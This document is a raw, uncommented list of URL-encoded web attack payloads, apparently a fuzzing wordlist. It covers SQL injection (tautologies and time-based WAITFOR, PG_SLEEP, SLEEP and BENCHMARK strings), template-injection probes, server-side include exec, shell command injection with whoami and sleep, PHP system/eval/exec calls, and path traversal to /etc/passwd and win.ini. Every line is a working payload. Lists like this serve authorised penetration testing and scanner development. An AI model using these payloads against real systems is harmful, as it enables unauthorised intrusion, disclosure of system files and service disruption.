'"(){};%20--%20-#/*
"')};({;%20--%20-#/*//
'%20or%20'1'='1'--%20-
${{<%[%'"}}%\.
{{7*7}}
{7*7}
${7*7}
#{7*7}
<%=%207*7%20%>
${{7*7}}
#{{7*7}}
7*7
&lt;!--#exec%20cmd=&quot;/usr/bin/whoami;--&gt;
&lt;!--#exec%20cmd=&quot;whoami;--&gt;
|%20whoami
&%20whoami
&&%20whoami
||%20whoami
;%20whoami
|whoami|
;system('whoami')
\nwhoami\n
|nwhoami\n
a);/usr/bin/whoami
a;/usr/bin/whoami
a);/usr/bin/whoami;
a;/usr/bin/whoami;
a);/usr/bin/whoami|
a;/usr/bin/whoami|
a)|/usr/bin/whoami
a|/usr/bin/whoami
a)|/usr/bin/whoami;
a|/usr/bin/whoami
<?php%20system("whoami");?>
$(`whoami`)
||%20phpinfo()
|%20phpinfo()
;%20phpinfo()
../../../../../etc/passwd
../../../../../windows/win.ini
../../../../../etc/passwd%00
%00../../../../../etc/passwd%00
....//....//....//....//etc/passwd
..\..\..\..\windows\win.ini
....\\....\\....\\....\\windows\win.ini
../\../\../\../\windows\win.ini
..\/..\/..\/..\/windows\win.ini
..\..\..\..\windows\win.ini%00
%00..\..\..\..\windows\win.ini%00
..\..\..\..\windows\win.ini
eval('echo%20XXXXXXXXXXXXXXXXX')
eval('sleep%205')
eval('sleep%205');
eval('whoami')
eval('whoami');
exec('echo%20XXXXXXXXXXXXXX')
exec('sleep%205')
exec('sleep%205');
exec('whoami')
exec('whoami');
||%20sleep%2010
|%20sleep%2010
;%20sleep%2010
{${sleep(10)}}
%20{${sleep(20)}}
&%20sleep%2010%20
&&%20sleep%2010
sleep%2010
||%20sleep%2015
|%20sleep%2015
;%20sleep%2015
&%20sleep%2015
&&%20sleep%2015
;WAITFOR%20DELAY%20'0:0:5'--%20-
);WAITFOR%20DELAY%20'0:0:5'--%20-
');WAITFOR%20DELAY%20'0:0:5'--%20-
;WAIT%20FOR%20DELAY%20'0:0:5'--%20-
);WAIT%20FOR%20DELAY%20'0:0:5'--%20-
');WAIT%20FOR%20DELAY%20'0:0:5'--%20-
;SELECT%20PG_SLEEP(5)--
);SELECT%20PG_SLEEP(5)--
');SELECT%20PG_SLEEP(5)--
-SLEEP(15)
-BENCHMARK(100000000,%20rand())
-BENCHMARK(100000000,rand())